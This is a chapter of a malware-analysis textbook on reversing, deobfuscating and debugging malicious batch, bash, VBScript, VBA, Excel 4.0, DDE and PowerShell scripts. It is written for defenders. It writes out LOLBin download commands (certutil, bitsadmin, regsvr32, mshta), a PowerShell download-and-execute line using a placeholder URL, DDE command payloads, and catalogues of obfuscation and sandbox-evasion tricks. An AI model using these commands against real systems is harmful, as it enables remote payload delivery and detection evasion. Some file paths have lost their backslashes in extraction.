10

Scripts and Macros – Reversing, Deobfuscation, and Debugging

Writing malware nowadays is a business, and, like any business, it aims to be as profitable as possible by reducing development and operational costs. Another strong advantage is being able to quickly adapt to changing requirements and the environment. Therefore, as modern systems become more and more diverse and low-level malware has to be more specific to its task, for basic operations, such as actual payload delivery, attackers tend to choose approaches that work on multiple platforms and require a minimum amount of effort to develop and upgrade. As a result, it is no surprise that scripting languages have become increasingly popular among attackers as many of them satisfy both of these criteria.

In addition to this, the traditional attacker requirements are still valid, such as being as stealthy as possible to successfully achieve malicious goals. If the script interpreter is already available on the target system, then the code will be of a relatively small size. Another reason for this anti-detection is that many traditional antivirus engines support binary and string signatures quite well, but to properly detect obfuscated code scripts, a syntax parser or emulator is required, and this might be costly for the antivirus company to develop and support. All of this makes scripts a perfect choice for first-stage modules.

In this chapter, we will cover the following topics:

Classic shell script languages

  • VBScript explained
  • VBA and Excel 4.0 (XLM) macros and more
  • The power of PowerShell
  • Handling JavaScript
  • Behind C&C – even malware has its own backend
  • Other script languages

Classic shell script languages

All modern operating systems support a command language of some kind, which is generally available through the shell. Their functionality varies from system to system. Some command languages might be powerful enough to be used as full-fledged script languages, while others support only the minimal syntax that is required to interact with the machine. In this chapter, we will cover the two most common examples: bash scripting for Unix and Linux and batch files for the Windows platform.

Windows batch scripting

The Windows batch scripting language was created mainly to facilitate certain administrative tasks and not to completely replace other full-fledged alternatives. While it supports certain programming concepts, such as functions and loops, some quite basic operations, such as string manipulations, might be less obvious to implement compared to many other programming languages. The code can be executed directly from the cmd.exe console interface or by creating a file with the .cmd or .bat extensions. Note that the commands are case insensitive.

The list of supported commands remains quite limited, even today. All commands can be split into two groups, as follows:

  • Built-in: This set of commands provides the most fundamental functionality and is embedded into the interpreter itself. This means that the commands don’t have their own executable files. Some example commands that might be of an attacker’s interest include the following:
    • call: This command executes functionality from the current batch file or another batch file, or executes a program
    • start: This command executes a program or opens a file according to its extension
    • cd: This command changes the current directory
    • dir: This command lists filesystem objects
    • copy: This command copies filesystem objects to a new location
    • move: This command moves filesystem objects to another location
    • del/erase: These commands delete existing files (not directories)
    • rd/rmdir: These commands delete directories (not files)
    • ren/rename: These commands change the names of the filesystem objects
  • External: These are tools that are provided as independent executable programs and can be found in a system directory. Some examples that are often misused by attackers include the following:
    • at: This schedules a program to execute at a certain time.
    • attrib: This displays or changes the filesystem object attributes; for example, the system, read-only, or hidden attributes.
    • cacls: This displays or changes the Access Control List (ACL).
    • find: This searches for particular filesystem objects; for example, by filename, by path, or by extension.
    • format: This formats a disk potentially overwriting the previous content.
    • ipconfig: This displays and renews the network configuration for the local machine.
    • net: This is a multifunctional tool that supports various network operations, including user (net user) and remote resource (net use/net share) administration, service management (net start/net stop), and more.
    • ping: This tool checks the connectivity to remote resources by using ICMP packets. It can also be used to establish a subvert network channel and exfiltrate data.
    • reg: This performs various registry-related operations, such as reg query, reg add, reg delete, and so on.
    • robocopy/xcopy: These tools copy filesystem objects to another location.
    • rundll32: This loads the DLL; here, exports by name and by ordinals are both supported.
    • sc: This communicates with Service Control Manager and manages Windows services, including creating, stopping, and changing operations.
    • schtasks: This is a more powerful version of the at tool; it works by scheduling programs to start at a particular time. This is essentially a console alternative to Windows Task Scheduler, and it supports local and remote machines.
    • shutdown: This restarts or shuts down the local or remote machine.
    • taskkill: This terminates processes by either name or PID; additionally, it supports both local and remote machines.
    • tasklist: This displays a list of currently running processes; additionally, it supports both local and remote machines.

Historically, no standard tools were provided to send HTTP requests (now curl has become available on modern versions of Windows) or to compress files. From the attacker’s perspective, this means that to implement more or less basic malware functionality, such as downloading, decrypting, and executing additional payloads, they must write extra code. Only later did system tools such as bitsadmin and certutil become commonly misused by attackers to download and decode the payloads. Here are some examples of how they were used:

  • bitsadmin /transfer <any_name> /download /priority normal <url> <dest>
  • certutil -urlcache -split -f <url> <dest>
  • certutil -decode <src> <dest>

In addition, there are a few lesser-known ways that Windows malware can access the remote payload using standard console commands, as follows:

  • regsvr32 /s /n /u /i:<url_to_sct> scrobj.dll
  • mshta <url_to_hta>
  • wmic os get /FORMAT:<url_to_xsl>

Finally, some standard tools such as wmic natively support remote machines, so it is possible to execute certain commands on another victim’s machine if there are available credentials without the extra tools required.

More non-standard security-related applications for standard tools can be found on the LOLBAS project page: https://lolbas-project.github.io/.

The most common obfuscation patterns for batch files are as follows:

  • Building commands by taking substrings from long blocks.
  • Using excessive variable replacements; here, many variables are either not defined or are defined somewhere far from their place of use.
  • Using long variable names of random uppercase and lowercase letters.
  • Adding multiple meaningless symbols such as pairs of double quotes or caret escape characters (^). An example can be seen in the following screenshot:
Figure 10.1 – An example of batch script obfuscation using escape symbols

Figure 10.1 – An example of batch script obfuscation using escape symbols

  • Mixing uppercase and lowercase letters in general (the Windows console is case insensitive unless the case makes a difference; for example, in base64 encoding). Here is an example:
Figure 10.2 – An example of batch script obfuscation using non-existing variables

Figure 10.2 – An example of batch script obfuscation using non-existing variables

The first and second cases can be handled by just printing the results of these operations using the echo command. The third and fourth cases can easily be handled by basic replacement operations, while the fifth case can be handled by just making everything lowercase except for things such as base64-encoded text.

Bash

Bash is a command-line interface that is native to the Unix world. It follows the one task one tool paradigm, where multiple simple programs can be chained together. The shell scripting supports fundamental programming blocks, such as loops, conditional constructs, and functions. In addition to this, it is powered by multiple external tools – most of which can be found on any supported system. Yet, unlike the Windows shell, which has multiple built-in commands, even the most basic functions, such as printing a string, are done by an independent program (in this case, echo). The common file extension for shell scripts is .sh. However, even a file without any extension will be executed properly if the corresponding interpreter is provided in the header; for example, #!/bin/bash. Unlike Windows, here, all commands are case sensitive.

There are many other shells in the Linux world, such as sh or zsh, but their syntax is largely the same.

As most Linux tools provide only a tiny piece of functionality, the full-fledged attack will involve many of them. However, some of them are used more often by attackers to achieve their goals, especially in mass-infection malware such as Mirai:

  • chmod: This changes permissions; for example, to make a file readable, writable, or executable.
  • cd: This changes the current directory.
  • cp: This copies filesystem objects to another location.
  • curl: This network tool is used to transfer data to and from remote servers through multiple supported protocols.
  • find: This searches for particular filesystem objects by name and certain attributes.
  • grep: This searches for particular strings in a file or files containing particular strings.
  • ls: This lists filesystem objects.
  • mv: This moves filesystem objects.
  • nc: This is a netcat tool that allows the attacker to read from and write to network connections using TCP or UDP. By default, it is not available on some distributions.
  • ping: This checks the access to a remote system by sending ICMP packets.
  • ps: This lists processes.
  • rm: This deletes filesystem objects.
  • tar: This compresses and decompresses files using multiple supported protocols.
  • tftp: This is a client for Trivial File Transfer Protocol (TFTP); it is a simpler version of FTP.
  • wget: This downloads files over the HTTP, HTTPS, and FTP protocols:
Figure 10.3 – An example of Mirai’s shell script

Figure 10.3 – An example of Mirai’s shell script

Just like for malware written in any other programming language, obfuscation can be incorporated here to slow down the reverse engineering process and bypass basic signature detection. Multiple approaches are possible in theory, such as dynamically decoding and executing commands, using crazy variable names, or applying sed/awk string replacements. However, it is worth mentioning that modern IoT malware still doesn’t incorporate any sophisticated tricks. This is mainly because the scripts that are used are quite generic and, often, they can only be reliably detected if the corresponding network IOC is known or if the final payload is detected.

That’s pretty much everything we need to know about shell scripts. Now, it’s time to talk about full-fledged programming languages. In particular, let’s start with Microsoft Visual Basic Scripting Edition (VBScript)-based threats.

VBScript explained

VBScript was the first mainstream programming language embedded into Windows OS. It has been actively used by system administrators to automate certain types of tasks without the need to install any third-party software. Available on all modern Microsoft systems, it gradually became a popular choice for malware writers who were looking for a guaranteed way of performing certain actions without any need to recompile the associated code.

At the time of writing, Microsoft has decided to switch to PowerShell to handle administrative tasks and has left all future VBScript support to the ASP.NET framework. So far, there are no plans to discontinue it in future Windows releases.

The native file extension for VBScript files is .vbs, but it is also possible to encode them into files using a .vbe extension. Additionally, they can be embedded into Windows script files (.wsf) or HTML application (.hta) files. .vbs, .vbe, and .wsf files can be executed either by wscript.exe, which provides the proper GUI, or cscript.exe, which is the console alternative. .hta files can be executed by the mshta.exe tool. VBScript code can also be executed directly from the command line using the mshta vbscript:<script_body> syntax.

Basic syntax

Initially, this technology was intended to be used by web developers and this fact drastically affected the syntax. VBScript is modeled on Visual Basic and has similar programming elements, such as conditional structures, loop structures, objects, and embedded functions. Data types are slightly different to work with: for example, all variables in VBScript have the Variant type by default.

Most of this high-level functionality can be accessed in the corresponding Microsoft Component Object Model (COM) objects. COM is a distributed system for creating and interacting with software components.

Here are some COM objects and the corresponding methods and properties that are often misused by attackers:

  • WScript.Shell: This gives access to multiple system-wide operations, as follows:
    • RegRead/RegDelete/RegWrite: These interact with the Windows registry to check the presence of certain software (such as an antivirus program), tamper with its functionality, delete traces of an activity, or add a module to autorun.
    • Run: This is used to run an application.
  • Shell.Application: This allows for more system-related functionality, as follows:
    • GetSystemInformation: This acquires various system information, for example, the size of the memory available to identify sandboxes
    • ServiceStart: This starts a service; for example, one that is associated with a persistent module
    • ServiceStop: This stops a service; for example, one that belongs to antivirus software
    • ShellExecute: This runs a script or an application
  • Scripting.FileSystemObject: This gives access to filesystem operations, as follows:
    • CreateTextFile/OpenTextFile: This creates or opens a file.
    • ReadLine/ReadAll: This reads the content of a file; for example, a file that contains some information of interest or another encrypted module.
    • Write/WriteLine: This writes to the opened file; for example, to overwrite an important file or configuration with other content, or to deliver the next attack stage or an obfuscated payload.
    • GetFile: This returns a File object that provides access to multiple file properties and several useful methods:
      • Copy/Move: This copies or moves files to the specified location
      • Delete: This deletes the corresponding file
      • Attributes: This property can be modified to change the file’s attributes
    • CopyFile/Move/MoveFile: This copies or moves a file to another location.
    • DeleteFile: This deletes the requested file.
  • Outlook.Application: This allows attackers to access Outlook applications to spread malware or spam:
    • GetNameSpace: Some namespaces, such as MAPI, will give attackers access to a victim’s contacts
    • CreateItem: This allows for a new email to be created
  • Microsoft.XMLHTTP/MSXML2.XMLHTTP: This allows attackers to send HTTP requests to interact with web applications:
    • Open: This creates a request, such as GET or POST
    • SetRequestHeader: This sets custom headers; for example, for victim statistics, an additional basic authentication layer, or even data exfiltration
    • Send: This sends the request
    • GetResponseHeader/GetAllResponseHeaders: These properties check the response for extra information or basic server validation
    • ResponseText/ResponseBody: These properties provide access to the actual response, such as a command or another malicious module
  • MSXML2.ServerXMLHTTP: This provides the same functionality as the previously mentioned XMLHTTP, but it is supposed to be used mainly from the server side. It is generally recommended because it handles redirects better.
  • WinHttp.WinHttpRequest: Again, this provides similar functionality, but it is implemented in a different library.
  • ADODB.Stream: This allows attackers to work with streams of various types, as follows:
    • Write: This writes to a stream object; this could be from the C&C response, for example
    • SaveToFile: This writes stream data to a file
    • Read/ReadText: These can be used to access the base64-encoded value
  • Microsoft.XMLDOM/MSXML.DOMDocument: These were originally designed to work with XML Document Object Model (DOM):
    • createElement: This can be used together with ADODB.Stream to handle base64 encoding once it is used with the bin.base64 DataType value and the NodeTypedValue property

So, how can all this information be used when we’re performing an analysis? Here is a simple example of code executing another payload:

Dim Val
Set Val= Wscript.CreateObject(“WScript.Shell")
Val.Run “""C:Tempevil.vbe"""

As you can see, once the object has been created, its method can be executed straight away. Among native methods, the following can be used to execute expressions and statements:

  • Eval: This evaluates an expression and returns a result value. It interprets the = operator as a comparison rather than an assignment.
  • Execute: This executes a group of statements separated by colons or line breaks in the local scope.
  • ExecuteGlobal: This is the same as Execute, but for the global scope. It is commonly used by attackers to execute decoded blocks.

Additionally, it is relatively straightforward to work with Windows Management Instrumentation (WMI) using VBScript. WMI is the infrastructure for managing data on Windows systems that gives access to various information, such as numerous system properties or a list of installed antivirus products. These are all potentially interesting to attackers.

Here are two ways it can be accessed:

  • With the help of the WbemScripting.SWbemLocator object and its ConnectServer method to access rootcimv2:

    Set objLocator = CreateObject("WbemScripting.SWbemLocator") Set objService = objLocator.ConnectServer(".", "rootcimv2") objService.Security_.ImpersonationLevel = 3

    Set Jobs = objService.ExecQuery("SELECT * FROM AntiVirusProduct")

  • Through the winmgmts: moniker:

    strComputer = "."

    Set oWMI = GetObject("winmgmts:\" & "." & " ootSecurityCenter2")

    Set colItems = oWMI.ExecQuery("SELECT * from AntiVirusProduct")

Now, let’s talk about what tools we can use to facilitate the analysis.

Static and dynamic analysis

The once-supported Microsoft Script Debugger has been replaced by Microsoft Script Editor and was distributed as part of MS Office up to its 2007 edition; it was later discontinued:

Figure 10.4 – The Microsoft Script Editor interface

Figure 10.4 – The Microsoft Script Editor interface

For basic static analysis, a generic text editor that supports syntax highlighting might be good enough. For dynamic analysis, it is highly recommended to use Visual Studio. Even the free community edition provides all the necessary functionality to do this in a very efficient way. To start the debugging process, first, you may wish to just execute the script the following way:

cscript.exe /x evilscript.vbs

However, for most people, it won’t work straight away. Before that, you will need to make sure your IDE is registered as a JIT debugger. To do this for Visual Studio, go to its Tools | Options... | Debugging | Just-In-Time settings and check that the Script tick is set:

Figure 10.5 – Registering Visual Studio as the JIT debugger for VBScript

Figure 10.5 – Registering Visual Studio as the JIT debugger for VBScript

After this, executing the aforementioned cscript command will automatically start suggesting that you use Visual Studio for debugging:

Figure 10.6 – cscript suggesting Visual Studio for VBScript debugging

Figure 10.6 – cscript suggesting Visual Studio for VBScript debugging

Once confirmed, everything is ready for you to start dynamic analysis:

Figure 10.7 – Debugging the VBScript file in Visual Studio

Figure 10.7 – Debugging the VBScript file in Visual Studio

While it is relatively straightforward to encode the .vbs file into .vbe using the EncodeScriptFile method provided by the Scripting.Encoder object, there is no native tool to decode the .vbe scripts back to .vbs; otherwise, it would diminish its purpose:

Figure 10.8 – The original and encoded VBScript files

Figure 10.8 – The original and encoded VBScript files

However, there are several open source projects available that aim to solve this problem; for example, the decode-vbe.py tool by Didier Stevens.

When analyzing the code, it makes sense to pay particular attention to the following operations:

  • Filesystem and registry access
  • Interaction with remote servers
  • Application and script execution

Finally, let’s talk about obfuscation and how to handle it.

Deobfuscation

Quite often, VBS obfuscation utilizes pretty basic techniques, such as adding garbage comments or using strings that require character replacement before they can be used. Syntax highlighting appears to be quite useful when analyzing such files.

Another common example is building a second-stage payload from the embedded data, such as from an array of integers, and then executing it dynamically, as shown in the following screenshot:

Figure 10.9 – VBScript malware dynamically builds a second-stage payload

Figure 10.9 – VBScript malware dynamically builds a second-stage payload

One of the easiest ways to convert it into the actual code is to use a great online tool called CyberChef:

Figure 10.10 – The second stage of the VBScript malware after decoding

Figure 10.10 – The second stage of the VBScript malware after decoding

Once you have the actual functional code, the easiest way to handle it is to search for the functions you are most interested in (the ones that we previously listed) and check their parameters to get information about dropped or exfiltrated files, executed commands, accessed registry keys, and C&C(s) to connect. If the obfuscation layer makes functionality completely obscure, then it is necessary to keep track of variables accumulating at the next stage script. You can iterate through the layers one by one, printing or watching them to get the next block’s functionality until the main block of code becomes readable.

Now that we’ve learned about VBScript, let’s talk about a slightly different topic – macros and the threats that rely on them.

VBA and Excel 4.0 (XLM) macros and more

While many loud malware attacks were related to exploited vulnerabilities, humans remain the weakest link in the defense chain. Social engineering techniques can allow malicious actors to successfully execute their code without creating or buying complicated exploits.

Since many organizations now provide cybersecurity training for all newcomers, many people know basic things, such as that it is unsafe to click on links or executable files received by various means from outside of the organization or the group of people that you know. Therefore, the attackers have to invent new ways to trick users, and documents containing malicious macros are a great example of these ongoing efforts.

VBA macros

MS Office macros incorporate the Visual Basic for Applications (VBA) programming language. This is derived from Visual Basic 6, which was discontinued a long time ago. VBA survived and was later upgraded to version 7. Normally, the code can only run within a host application, and it is built into most Microsoft Office applications (even for macOS).

Basic syntax

VBA is a dialect of Visual Basic and inherited its syntax. VBScript can be considered as a subset of VBA with a few simplifications, mainly caused by different application models. The same elements need to be paid attention to when analyzing VBA objects:

  • File and registry operations
  • Network activity
  • Executed commands

The list of COM objects that are of the attacker’s interest is also the same as they are for VBScript. The only difference is that some functionality can be accessed without creating objects; for example, the Shell method.

To ensure that it will be executed automatically, malware must use one of the standard function names that will define when it should happen. These names are slightly different for different MS Office products. Here are the most commonly misused ones:

  • AutoOpen/Auto_Open
  • AutoExit/Auto_Close
  • AutoExec
  • Document_Open/Workbook_Open

Here is an example of Document_Open being used for this purpose:

Figure 10.11 – A malicious VBA macro registering the Document_Open routine to achieve execution

Figure 10.11 – A malicious VBA macro registering the Document_Open routine to achieve execution

Malware can also install dedicated handlers so that it can be executed later under some condition, for example, using the Application.OnSheetActivate function.

MS Office has its own auto-start directories that are commonly misused by malware to achieve persistence. They do this by placing their code there. Here are the standard ones for different products and versions:

  • %APPDATA%MicrosoftWordSTARTUP
  • C:Program FilesMicrosoft Office[root]<Office1x>STARTUP
  • %APPDATA%MicrosoftExcelXLSTART
  • C:Program FilesMicrosoft Office[root]<Office1x>XLSTART

Apart from that, persistence can be achieved by manipulating global macro files:

  • Normal.dot/.dotm: The global macro template for Word (in %APPDATA%MicrosoftTemplates)
  • Personal.xls/.xlsb: The global macro workbook for Excel (in XLSTART)

Now, let’s talk about what tools can help us analyze malicious macros.

Static and dynamic analysis

Unlike VBScript, VBA has a native editor in MS Office that can be accessed from the Developer tab, which is hidden by default. It can be enabled in Word Options in the Customize Ribbon menu:

Figure 10.12 – Enabling the VBA macro editor in MS Office options

Figure 10.12 – Enabling the VBA macro editor in MS Office options

It supports debugging the code in this way, making both static and dynamic analysis relatively straightforward.

Another tool that can extract macros from documents is OfficeMalScanner, when executed with the info command-line argument. Apart from this, the previously mentioned tools from the oletools project (especially olevba) and oledump can be used to extract and analyze VBA macros as well. If the engineer wants to work with p-code instead of source code for some reason, the pcodedmp project aims to provide the required functionality.

Finally, ViperMonkey can be used to emulate some VBA macros and, in this way, help handle obfuscation.

Excel 4.0 (XLM) macros

XLM macros, also known as formulas, are a 30-year-old feature of Microsoft Excel that suddenly gained popularity among attackers recently. An example of it is a SUM function, which is commonly used to automatically calculate a sum of numbers spread across multiple cells. While some of them may be dangerous out of the box, such as EXEC, which allows for arbitrary command execution, in most cases, attackers chain many benign ones to implement malicious functionality.

Basic syntax

Here are some examples of commonly misused formulas in the final deobfuscated payload:

  • Conditions: IF(logical_test, value_if_true, value_if_false)
  • Searching: SEARCH(find_text, within_text, start_num)
  • Calling WinAPIs directly: CALL(dll_name, api_name, format, arg0, …)

Another option similar to the CALL option is REGISTER.

An obvious example of a simple malicious payload utilizing them would be calling APIs such as URLDownloadToFile and ShellExecuteA to deliver and execute the next stage of the payload.

But in reality, pretty much all modern malicious macros will be obfuscated and will use a different set of macros to build the actual malicious functionality. We are going to cover them here. For .xls documents following the Compound File Binary (CFB) structure (more information can be found in Chapter 8, Handling Exploits and Shellcode), the workbook data is stored in the Binary Interchange File Format (BIFF8) format. Microsoft Excel doesn’t provide full functionality to edit it, so malware analysts may need to use dedicated tools to amend some of the changes that are made by the attackers to hide the content. For both .xlsb and .xlsm OOXML-based Excel documents, the corresponding data can generally be found in the xlmacrosheets directory in BIFF12 and XML formats, respectively.

Finally, the same as in VBA macros, formulas can use some particular standard cell names to achieve autorun capabilities. An example would be the cell starting with the Auto_Open prefix:

Figure 10.13 – The cell with the XLM macro that will be automatically executed

Figure 10.13 – The cell with the XLM macro that will be automatically executed

Now, let’s talk about how XLM-based payloads can be obfuscated.

Obfuscation

There are multiple ways attackers may attempt to complicate the work of reverse engineers trying to figure out malware’s purpose. Let’s explore the most common of them:

  • Using a white font on a white background and scattered formulas to make them invisible when the document is opened.
  • Using the RUN and GOTO formulas to complicate the control flow by jumping from one cell to another.
  • Using the CHAR command to resolve string characters dynamically and MID to get substrings.
  • Moving or accumulating the content around the sheet using the FORMULA command or modifying it using a combination of the GET.CELL and SET.VALUE commands.
  • Storing malicious formulas in hidden sheets. There are two types, and each should be handled differently:
    • hidden: Right-click on any visible sheet and select Unhide…, then enable all hidden ones:
Figure 10.14 – Unhiding hidden sheets in Excel

Figure 10.14 – Unhiding hidden sheets in Excel

  • veryhidden: Change the hsState field from 2 to 0 in the corresponding BoundSheet record that’s in BIFF8 format (this requires using dedicated tools such as OffVis):
Figure 10.15 – Changing the hsState field associated with a veryhidden sheet

Figure 10.15 – Changing the hsState field associated with a veryhidden sheet

  • Using hidden names. To reveal them, clear the fHidden bit in the corresponding LBL record:
Figure 10.16 – Changing the fHidden field to unhide the associated name

Figure 10.16 – Changing the fHidden field to unhide the associated name

  • Using GET.WORKSPACE with different arguments to detect sandboxes, such as the following:
    • 13/14: Workspace width/height
    • 19: Mouse availability
    • 31: If single-step mode is currently being used
    • 42: Audio availability
  • Executing the payload only on a particular day to tamper with behavioral analysis
  • Checking font size and row height or if the window has been maximized to detect tampering

These are the most common obfuscation techniques. Finally, let’s see what tools can help us with the analysis.

Static and dynamic analysis

First of all, the already mentioned olevba tool can be used to automatically extract XLM macros as well. If another tool called XLMMacroDeobfuscator is also installed on the same system, the output of olevba will also be nicely deobfuscated:

Figure 10.17 – Extracted and deobfuscated chain of XLM macros

Figure 10.17 – Extracted and deobfuscated chain of XLM macros

Apart from that, Microsoft Excel provides great embedded capabilities for debugging formulas. Mainly, its Name Manager and Macro Debugger parts will be particularly useful:

Figure 10.18 – Dynamic analysis of a chain of XLM macros using Excel’s debugger

Figure 10.18 – Dynamic analysis of a chain of XLM macros using Excel’s debugger

Finally, the BiffView and OffVis tools can provide an intimate view of BIFF8 internals. OffVis can also help bypass some of the aforementioned obfuscation techniques that involve hiding sheets and names.

That’s it for XLM macros. We have already learned a lot about macro-based threats, so now, it is time to cover other ways how malware may achieve its goals by misusing MS Office documents.

Besides macros

There are other methods that attackers may use to execute code once the document is opened. Another approach is to use the mouse click/mouse over technique, which involves executing a command when the user moves the mouse over a crafted object in PowerPoint.

This can be done by assigning the corresponding action to it, as follows:

Figure 10.19 – Adding an action to an object in PowerPoint

Figure 10.19 – Adding an action to an object in PowerPoint

The good news is that updated versions of Microsoft Office should have a protected view (read-only access) security feature enabled, which will warn a user about a potential external program’s execution if the document came from an unsafe location. In this case, it will be all about social engineering – whether the attacker succeeds in convincing the victim to ignore or disable all warnings.

Another less common way how malware may achieve execution is by using Setting Content files. These are XML-based files that can be executed on their own (with a .SettingContent-ms file extension) or embedded into other documents. The DeepLink tag can be used there to specify the command to be executed. After the first few attempts to misuse this functionality, Microsoft promptly beefed up the security of this feature. Now, we don’t see malware targeting it much.

Finally, the Dynamic Data Exchange (DDE) functionality can also be used to execute malicious commands. One way it can do this is by adding a DDEAUTO field with the command to execute, specified as the argument. Another way this functionality can be misused is by using particular syntax in Microsoft Excel. In this case, a malicious file will contain the command crafted in the following way:

(+|-|=)<command_to_execute>|'<optional_arguments_prepended_by_space>'!<row_or_c olumn_or_cell_number>

Alternatively, the command can be passed as an argument to a built-in benign function such as SUM. Here are some example payloads that execute calc.exe after the user’s confirmation:

=calc|' '!A
+cmd|' /c calc.exe'!7
@SUM(calc|' '!Z99)

Here is an example of the warning message that’s displayed by Microsoft Excel when this technique is used:

Figure 10.20 – An example of a Microsoft Excel warning box related to potential code execution

Figure 10.20 – An example of a Microsoft Excel warning box related to potential code execution

The msodde tool (part of oletools) may help in detecting such techniques in samples.

While any code execution here will require user confirmation before being enabled, it remains a possible attacking vector with the help of social engineering.

Now that we’ve mastered macro-based threats, it is time to talk about another scripting language commonly misused by attackers these days – PowerShell!

The power of PowerShell

PowerShell represents an ongoing evolution of Windows shell and scripting languages. Its powerful functionality, access to .NET methods, and deep integration with recent versions of Windows have facilitated the increase of its popularity drastically among common users and malicious actors. From the point of view of the attacker, it has many other advantages, especially in terms of obfuscation, which we are going to cover in great detail. Additionally, because the whole script can be encoded and executed as a single command, it requires no script files to hit the hard disk and leaves minimal traces for forensic experts.

Let’s start with the peculiarities of its syntax.

Basic syntax

PowerShell command-line arguments provide unique opportunities for the attackers because of certain characteristics of their implementation. For example, PowerShell understands even truncated arguments and the associated parameters, so long as they are not ambiguous. Let’s go through some of the most common values that are used when executing the malicious code:

  • -NoProfile (often referred to as -NoP): This skips the process of loading the PowerShell profile; it is useful as it is not affected by local settings.
  • -NonInteractive (often referred to as -NonI): This doesn’t present an interactive prompt; it is useful when the purpose is to execute specified commands only.
  • -ExecutionPolicy (often referred to as -Exec or -EP): This is often used with the Bypass argument to ignore settings that limit certain PowerShell functionality. It can also be achieved by many other approaches; for example, by modifying PowerShell’s execution policy registry value.
  • -WindowStyle (often referred to as -Win or -W): This is usually used by attackers with a Hidden (or 1) argument to hide the corresponding window for stealth purposes.
  • -Command (often referred to as -C): This executes a command provided in a command line.
  • -EncodedCommand (often referred to as -Enc, -EC, or -E): This executes an encoded (base64) command provided in a command line.

In the preceding examples, the command-line arguments can be truncated to any number of letters and still be valid for PowerShell. For example, -NoProfile and -NoProf, or Hidden and Hidde, will be processed in the same way.

Regarding the syntax, let’s look at some commands that are often misused by attackers.

Native cmdlets:

  • Invoke-Expression (iex): This executes a statement provided as an argument; it is very similar to the eval function in JavaScript.
  • Invoke-Command (icm): This is often used with the -ScriptBlock argument to achieve pretty much the same functionality as Invoke-Expression.
  • Invoke-WebRequest (iwr): This sends a web request; for example, it could send a request to interact with the C&C.
  • ConvertTo-SecureString: This is commonly used for decrypting an embedded script.

NET-based methods:

  • From the [System.Net.WebClient] class, we have the following:
    • DownloadString: This downloads a string and stores it in memory, for example, a new command or a script to execute.
    • DownloadData: This is less often used by attackers; it downloads the payload as a byte array.
    • DownloadFile: This downloads a file to disk, for example, a new malicious module.

Each of these methods has an async version as well, with the corresponding name suffix (such as DownloadStringAsync).

  • From the [System.Net.WebRequest], [System.Net.HttpWebRequest], [System.Net.FileWebRequest], and [System.Net.FtpWebRequest] classes, we have the following:
    • Create (also CreateDefault and CreateHttp): This creates a web request to the server.
    • GetResponse: This sends a request and gets a response, such as with a new malicious module. Versions with the Async suffix and the Begin and End prefixes are also available for asynchronous operations (such as BeginGetResponse or GetResponseAsync), but they are rarely used by attackers.
    • GetRequestStream: This returns a stream for writing data to the internet resource – to exfiltrate some valuable information or send infection statistics, for example. Versions with the Async suffix and the Begin and End prefixes are available as well.
  • From the [System.Net.Http.HttpClient] class, we have the following:
    • GetAsync, GetStringAsync, GetStreamAsync, GetByteArrayAsync, PostAsync, and PutAsync: These are multiple options for sending any type of HTTP request and getting a response back.
  • The [System.IO.Compression.DeflateStream] and [System.IO.Compression.GZipStream] classes are commonly employed to decompress the embedded shellcode after decoding it using the base64 algorithm. They are usually used with the [System.IO.Compression.CompressionMode]::Decompress parameter as an argument for an [System.IO.StreamReader] object (see the following screenshot for an example).
  • From the [System.Convert] class, we have the following:
    • FromBase64String: This decrypts base64-encoded strings, such as the next stage payload

For .NET namespaces, the System. prefix can be safely omitted, as follows:

Figure 10.21 – An example of a Veil payload

Figure 10.21 – An example of a Veil payload

As we can see, using a combination of compression and base64 encoding is a very popular technique among attackers to store the next stage payload and, in this way, complicate the analysis and detection. We will talk about other obfuscation techniques in greater detail in the next section. Here is an example of the code downloading the payload and executing it:

iex(new-object net.webclient).downloadstring('http://<url>/payload.bin')

Just like command-line arguments, the method names can be truncated without creating ambiguity. The Get-Command/gcm command with wildcards can be used by the analyst to identify the full name and can also be used by attackers to dynamically resolve them.

PowerShell can also be used to execute custom .NET code. In particular, the Add-Type -TypeDefinition <variable_storing_source_code> syntax can be used to dynamically compile .NET source code directly in the PowerShell script so that it can be used straight away. The csc.exe tool will be used behind the scenes for this purpose.

The notorious PowerShell-based Bluwimps stores information in WMI management classes. This makes it harder to detect using traditional antivirus solutions, and it can remotely execute code using the Windows Management Instrumentation Command (WMIC) instead of utilizing the more widely used psexec tool.

Obfuscation

There are multiple open source tools available online that can generate and/or obfuscate PowerShell-based payloads for penetration testing. This list includes, but is not limited to, the following:

  • PowerSploit
  • PowerShell Empire
  • Nishang
  • MSFvenom (part of Metasploit)
  • Veil
  • Invoke-Obfuscation

As we know, PowerShell commands are executed through the Windows console, so pretty much any obfuscation technique we described previously can be applied here as well. In addition to this, several other simple obfuscation tricks have proved to be popular:

  • Multiple string concatenations with either a basic + syntax with actual values or variables storing them or using the Join or Concat functions.
  • Multiple excessive single, double, and backquotes.
  • split and join usage, as shown here:

    iex (<value_with_separators>.split("<separator>") -join "") | iex)

  • String reverse (generally, either by reading a reversed string from the end or casting it to an array and using [Array]::Reverse; it rarely uses regex with the RightToLeft traverse type). The use of [Char]<numeric_value> or ToInt<int_size> syntaxes instead of the symbols themselves.
  • A combination of compression and base64 encoding using the aforementioned methods (see Figure 10.21 for an example).

In terms of encryption, the following approaches have proved to be popular:

  • The -bxor arithmetic operator for simple encryption.
  • The ConvertTo-SecureString cmdlet for converting the encrypted block into a secure string, which stores information in an encrypted form in memory. It is often used with the following code block to access the actual value inside the secure string:

    [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR(<secure_string>))

For this cmdlet, the decryption key can be provided in either a -key or a -securekey argument (or perhaps something like -kE).

To handle them, you must successfully identify the algorithm that’s being used and then reverse the logic using the information available. Writing simple scripts using your language of preference is one option, but in many cases, it can only be handled using the online CyberChef tool.

Let’s talk about what other tools we can use to facilitate the analysis.

Static and dynamic analysis

PowerShell has a powerful embedded help tool that can be used to get the description of any command. It can be obtained by executing a Get-Help <command_name> statement:

Figure 10.22 – Getting a description for a PowerShell command

Figure 10.22 – Getting a description for a PowerShell command

Overall, deobfuscation and decoding operations mainly require only a basic set of skills, such as how to decode base64, how to decompress deflate and gzip, how to remove meaningless characters, how to replace variables, and how to read partially written commands. Any text editor with the corresponding syntax highlight can be used for static analysis in this case.

While xor can be decrypted in multiple ways, the easiest way to handle embedded PowerShell encryption is through dynamic analysis in the PowerShell Integrated Scripting Environment (ISE). In this case, the code to dump the decrypted string on a disk is added straight after the decryption block. For this purpose, the Set-Content, Add-Content, and Out-File cmdlets, along with the pipe symbol (|) or classic > and >> input redirects, can be used:

powershell -c "$a='secret'; $a | set-content 'output.txt'"

